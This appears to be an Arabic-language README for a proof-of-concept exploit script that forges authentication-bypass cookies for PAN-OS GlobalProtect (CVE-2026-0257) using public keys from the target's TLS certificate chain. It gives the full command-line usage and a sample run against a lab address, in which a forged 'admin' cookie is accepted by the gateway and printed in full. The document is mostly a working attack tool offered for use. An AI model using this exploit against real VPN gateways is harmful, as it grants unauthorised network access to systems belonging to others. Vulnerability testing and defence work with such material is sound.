
نص برهان المفهوم لاستغلال تجاوز المصادقة في PAN-OS GlobalProtect CVE-2026-0257
نص برهان مفهوم لاختبار بوابة GlobalProtect أو مدخلها في هدف PAN-OS لـ CVE-2026-0257. يحاول النص تزوير كوكي تجاوز مصادقة صالحة عن طريق التكرار على سلسلة الشهادات المستخدمة من قبل خدمة HTTPS، ولكل مفتاح عام في السلسلة، يتم تزوير كوكي تجاوز مصادقة جديد، واختباره ضد هدف GlobalProtect لمعرفة ما إذا كان صحيحًا.
ستسجل كوكي تم تزويرها بنجاح الدخول إلى هدف GlobaProtect وتسترد معلومات اتصال VPN (استخدم الوسيط --verbose للفحص).
$ python forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID]
[--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]
تزوير كوكي تجاوز المصادقة لـ GlobalProtect باستخدام المفتاح العام من TLS (CVE-2026-0257).
options:
-h, --help عرض رسالة المساعدة هذه والخروج
--target TARGET هدف بوابة GlobalProtect أو مدخلها (IP أو اسم مضيف)
--port PORT المنفذ الهدف (الافتراضي: 443)
--user USER اسم المستخدم لتزوير الكوكي له (الافتراضي: admin)
--domain DOMAIN النطاق للكوكي (الافتراضي: فارغ)
--host-id HOST_ID معرف المضيف للكوكي (الافتراضي: فارغ)
--client-os CLIENT_OS
نظام تشغيل العميل للكوكي (الافتراضي: Windows)
--client-ip CLIENT_IP
عنوان IP للعميل في الكوكي (الافتراضي: 0.0.0.0)
--context {gateway,portal,both}
السياق المراد اختباره: gateway، portal، أو both (الهدف الافتراضي)
--verbose طباعة الاستجابة الكاملة
$ python forge_cookie.py --target 192.168.86.99
[*] Retrieving certificate chain from 192.168.86.99:443 ...
Found 2 certificate(s) in chain:
[0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
[1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)
[*] Forging cookie for user 'admin', testing each key
Trying [0] CN=192.168.86.99
[-] Failure - Gateway did not accepted the forged cookie
[-] Failure - Portal did not accepted the forged cookie
Trying [1] CN=GP-Lab-CA
[+] Success - Gateway accepted the forged cookie
Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==